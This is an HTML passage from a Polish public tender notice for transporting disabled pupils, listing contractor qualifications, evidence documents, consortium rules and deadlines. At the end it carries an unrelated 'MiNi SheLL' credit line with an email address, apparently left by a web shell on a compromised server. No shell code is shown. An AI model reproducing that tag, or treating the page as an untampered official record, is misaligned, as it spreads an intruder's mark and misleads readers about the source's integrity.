społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	Zdolności do występowania w obrocie gospodarczym. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego, na podstawie ustawy z dnia 06 września 2001 r. o transporcie drogowym (t. j. Dz. U. z 2024 r. poz. 1539 z późn. zm.);<br/>3)	Sytuacji ekonomicznej lub finansowej. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>2.	Zdolności technicznej lub zawodowej. <br/>1)	Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej dwie usługi polegające na dowodzie uczniów niepełnosprawnych do placówek oświatowych o wartości nie mniejszej niż 50.000,00 zł każda – dotyczy Części I i II postępowania.<br/>2)	Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował na etapie realizacji umowy minimum 1 pojazdem <br/>I część postępowania:<br/>•	o liczbie miejsc siedzących co najmniej 16<br/>•	przystosowanym do przewozu osób niepełnosprawnych, <br/>•	posiadającym aktualne ubezpieczenie OC i NNW dla kierowcy <br/>i pasażerów,<br/>•	wyprodukowanym nie wcześniej niż w 2010 r. <br/>II część postępowania:<br/>•	liczbie miejsc siedzących co najmniej13 <br/>•	przystosowanym do przewozu osób niepełnosprawnych, <br/>•	posiadającym aktualne ubezpieczenie OC i NNW dla kierowcy <br/>i pasażerów,<br/>•	wyprodukowanym nie wcześniej niż w 2010 r. <br/><br/>UWAGA!!!! W przypadku złożenia oferty przez Wykonawcę na I i II część postępowania w celu potwierdzenia spełnienia warunku udziału w postępowaniu Wykonawca wykaże, że posiada 2 różne pojazdy spełniające powyższe warunki udziału w postępowaniu. <br/><br/>3)	Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował na etapie realizacji umowy co najmniej:<br/>•	1 kierowcą:<br/>−	posiadającym uprawnienia do kierowania pojazdami, tj. prawo jazdy odpowiednie do pojazdu,<br/>−	posiadającym przeszkolenie w zakresie udzielania pierwszej pomocy;<br/>−	niekaraną i nie wpisaną do rejestru przestępstw na tle seksualnym.<br/>•	1 osobą pełniącą funkcję opiekuna:<br/>−	posiadającą przeszkolenie w zakresie udzielania pierwszej pomocy,<br/>−	niekaraną i nie wpisaną do rejestru przestępstw na tle seksualnym.<br/><br/>UWAGA!!!! W przypadku złożenia oferty przez Wykonawcę na I i II część postępowania w celu potwierdzenia spełnienia warunku udziału w postępowaniu Wykonawca wykaże, że posiada 2 różnych kierowców i 2 różne osoby pełniące funkcję opiekuna.<br/><br/>UWAGA!!! Zamawiający nie dopuszcza łączenia funkcji kierowcy i opiekuna. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona na potwierdzenie spełnienia warunków, o których mowa w rozdziale XVI SWZ, zostanie wezwany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1)	aktualnej licencji na wykonywanie krajowego transportu drogowego, na podstawie ustawy z dnia 06 września 2001 r. o transporcie drogowym (t. j. Dz. U. z 2024 r. poz. 1539 z późn. zm.);<br/>2)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały wykonane, o treści odpowiadającej załącznikowi nr 8 do SWZ oraz dowody określające czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (załącznik nr 8 do SWZ);<br/>3)	wykaz osób kierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 9 do SWZ); <br/>4)	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją <br/>o podstawie do dysponowania tymi zasobami (załącznik nr 10 do SWZ);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wykonawca, którego oferta zostanie najwyżej oceniona na potwierdzenie braku przesłanek wykluczenia, zostanie wezwany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; (w ramach potwierdzenia posiadania kompetencji, o których mowa w oświadczeniu) - w przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną,<br/>2)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia <br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. <br/>poz. 1616) z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami <br/>lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr 7 do SWZ.<br/><br/>2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w ust. 1 składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>3.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone pod przysięgą lub jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów <br/>o świadczeniu pod przysięgą złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o zamówienie.<br/>2.	Wykonawcy wspólnie ubiegający się o zamówienia ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnictwo musi być załączone do oferty. <br/>4.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>5.	W przypadku, gdy Wykonawca realizował zamówienie, jako jeden z grupy Wykonawców (konsorcjum) może powoływać się jedynie na swoje własne, realne doświadczenie, które zdobył realizując daną część zamówienia, która została mu przypisana w ramach grupy, tzn. może wykazywać się doświadczeniem jedynie w zakresie, jaki rzeczywiście dany podmiot wykonywał. Doświadczenia nie uzyskuje się poprzez sam udział w konsorcjum, lecz poprzez konkretne czynności realizowane w jego ramach.<br/>6.	Wykonawcy wspólnie ubiegający się o zamówienie na podstawie art. 117 ust. 4 Pzp składają wraz z ofertą oświadczenie, z którego wynika, jaki zakres przedmiotu zamówienia wykonają poszczególni Wykonawcy – zgodnie z treścią załącznika nr 5 do SWZ.<br/>7.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania oraz oświadczenie o spełnieniu warunków udziału w postępowaniu oraz braku podstaw do odrzucenia składa każdy z Wykonawców wspólnie ubiegający się o zamówienie.<br/>8.	Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania: <br/>1)	oferta wspólna powinna być sporządzona zgodnie z SWZ; <br/>2)	sposób składania dokumentów w ofercie wspólnej: <br/>a)	dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu; <br/>b)	dokumenty wspólne takie jak np.: formularz ofertowy, formularz cenowy, dokumenty podmiotowe i przedmiotowe, oświadczenie składne na podstawie art. 117 ust. 4 ustawy Pzp składa pełnomocnik Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną; <br/>c)	kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych Wykonawców. <br/>9.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie wybrana, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przedstawić Zamawiającemu kopię umowy, zawierające w swojej treści uregulowanie współpracy tych Wykonawców na potrzeby niniejszego postępowania, zawierającą, co najmniej: <br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia, <br/>2)	określenie zakresu działania poszczególnych stron umowy, <br/>3)	czas obowiązywania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności.<br/>2.	Zakazuje się istotnych zmian postanowień umowy w stosunku do treści oferty, <br/>na podstawie, której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 3 i ust. 4.<br/>3.	Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w zakresie:<br/>1)	terminu wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany; <br/>2)	sposobu wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany;<br/>3)	zmiany zakresu przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany;<br/>4)	zmiany wynagrodzenia wraz ze skutkami wprowadzenia takiej zmiany.<br/>Szczegółowe warunki zmiany umowy zostały opisane w § 9 istotnych postanowień umowy (załącznik nr 5 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://celestynow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-18 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>2)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym <br/>w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124 z późn. zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120 z późn.zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy.<br/>2.	Oferta Wykonawcy wykluczonego na podstawie przepisu, o który mowa w ust. 1 zostanie odrzucona.

Creat By MiNi SheLL
Email: jattceo@gmail.com